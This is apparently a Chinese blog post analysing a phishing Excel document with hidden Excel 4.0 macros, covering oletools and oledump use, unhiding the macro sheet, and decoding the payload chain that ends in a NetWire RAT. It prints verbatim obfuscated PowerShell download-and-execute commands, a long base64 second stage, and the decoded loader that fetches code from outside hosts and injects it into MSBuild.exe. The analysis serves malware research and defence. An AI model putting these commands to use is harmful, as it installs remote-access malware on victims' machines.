分析钓鱼邮件搭载的Excel 4.0恶意宏

张安全技术 4年前

1.89K 0

简介

工欲善其事必先利其器，首先既然遇到的是宏病毒文件，所以本地得装好office，本文使用的环境为office2016，之后打开Excel。额，咋和平时看到的Excel表格不一样？如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容，本质就是诱惑用户来启用宏，所以文档存在宏代码的话一启动就被提示需要启用宏。嘿嘿，别启用就对了。

分析钓鱼邮件搭载的Excel 4.0恶意宏

对于宏病毒，笔者目前接（是）触（工）不（具）多（党），不过之前使用过一个Python工具oletools。如果是Python2.7环境则安装命令为：pip install oletools。

分析钓鱼邮件搭载的Excel 4.0恶意宏

装好后，利用oletools工具里的mraptor(macrorapter)查看是否可疑，如下显示可疑文件。

分析钓鱼邮件搭载的Excel 4.0恶意宏

如果使用olevba提取恶意宏会解析失败，如下。

分析钓鱼邮件搭载的Excel 4.0恶意宏

如果之前没有过多接触宏病毒，到这里肯定就一头雾水。其实原因是该样本没有存在VBA宏，而是被检测到了Excel 4.0宏（这个技术存在的时间比我年龄还大，真的），属性设置为隐藏。

分析钓鱼邮件搭载的Excel 4.0恶意宏

关于Excel 4.0宏暂时不过多介绍了，因为参考链接里介绍的很详细了，有兴趣就直接看文末的链接，没有兴趣直接看笔者接下来的操作。不过虽然不能手工提取恶意代码，但是取巧也可以通过沙箱获取执行的命令，如下。

分析钓鱼邮件搭载的Excel 4.0恶意宏

第一阶段命令，如下。

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt');

第二阶段命令scan.txt内容如下，会使用IEX命令当做脚本内容执行。

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBuAEkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawBuAE0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBuAEEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBuAEMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBuAEEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAuAEgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

如何取消隐藏属性？

该样本是无法通过右键来取消隐藏的，因为首先文档里不显示宏工作表，想右键取消会发现没有选项，但是这里可以使用oledump这个工具辅助一下，使用的命令如下：

oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a" C:UsersonionDesktopDokumentation.xlsDokumentation.xls

分析钓鱼邮件搭载的Excel 4.0恶意宏

得到位置序列：51 AA 02 00 01，0x00表示不隐藏，0x01表示隐藏，0x02表示深度隐藏。

分析钓鱼邮件搭载的Excel 4.0恶意宏

直接手工修改十六进制，如下。

分析钓鱼邮件搭载的Excel 4.0恶意宏

当保存后重新打开会出现宏工作表，不过宏代码目前是无法显示的，因为字体设置为白色了，也是为了对抗分析，增加迷惑性。

分析钓鱼邮件搭载的Excel 4.0恶意宏

我们可以选中后更改字体颜色，让宏代码显示出来。

分析钓鱼邮件搭载的Excel 4.0恶意宏

如何手工提取宏代码？

由于字体显示空白，可将其复制，之后再新建XLM 4.0宏表，粘贴至另外的宏工作表，然后全选中，接着修改文字颜色，就可以查看了。咦，出现了明显的PowerShell脚本痕迹。

分析钓鱼邮件搭载的Excel 4.0恶意宏

最后整理一下，完整代码如下。

=RETURN()

p://putin-malwrhunterteams.com/scan.txt');exit

=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)

拿到响应内容，如下。

进一步解码得到，解混淆后的PowerShell脚本内容。

分析钓鱼邮件搭载的Excel 4.0恶意宏

仔细阅读脚本内容后，发现前面是垃圾代码与增加延时，最后是通过调用CallByName下载下一阶段内容执行。

地址//paste.ee/r/e49u0，//paste.ee/r/dlOMz。

分析钓鱼邮件搭载的Excel 4.0恶意宏

文字版如下：

Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf)

$DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY';

$CWpvyyivlUxxUVObqdPlWq = 'bfi';

$rMoZw = 'yxapiZPoYWefF';

$rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy';

$YmiLoue = 'Jt';

$RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB';

}

$ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx';

If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') {

$SK = 'CveCYiWSRvzoQRCfK';

$HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq';

$SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI';

$YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt';

$cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP';

$vwPYEaIUoi = 'txTXptVqiYWHOiNf';

}

$PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX';

DO{

$ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa';

$gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP';

$LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr';

$qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF';

$wBNpjezYQikY = 'JV';

$sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn';

$Nyi= $Nyi + 1;} While ($Nyi -ne 6)

While ($WGgrdVmg -ne 6) {

$DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL';

$WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj';

$WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb';

$WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV';

$WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs';

$WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv';

$WGgrdVmg= $WGgrdVmg + 1;}

Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL)

$fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx';

$qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA';

$EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin';

$fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR';

$FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg';

$seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV';

$yZlTWTedKQSpJGFWoZf = 'dvzKYu';

$GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb';

$bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW';

$eHqkuioTKriA = 'QrhqaXdgzmxGRrw';

$aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs';

$crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU';

$ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr';

$BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu';

}

$nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez';

Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy)

$FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI';

$XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO';

$TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY';

$YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak';

}

$reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g');

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX;

[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX;

[k.Hackitup]::exe('MSBuild.exe',$f)

下载到第一个经解码后的文件，不过是已经经过处理得到的dll文件。分析钓鱼邮件搭载的Excel 4.0恶意宏

实际名称为Hackitup，如下可大致判断出后续会进行进程注入，结合上述的解码脚本内容，可发现注入的进程为MSBuild.exe。分析钓鱼邮件搭载的Excel 4.0恶意宏

下载到第二个文件，简单分析为NetWire RAT远控木马。

分析钓鱼邮件搭载的Excel 4.0恶意宏

C2肯定已经失效了，但是也贴一下吧。

分析钓鱼邮件搭载的Excel 4.0恶意宏

参考链接

https://www.virustotal.com/gui/file/67fd76d01ab06d4e9890b8a18625436fa92a6d0779a3fe111ca13fcd1fe68cb2/details

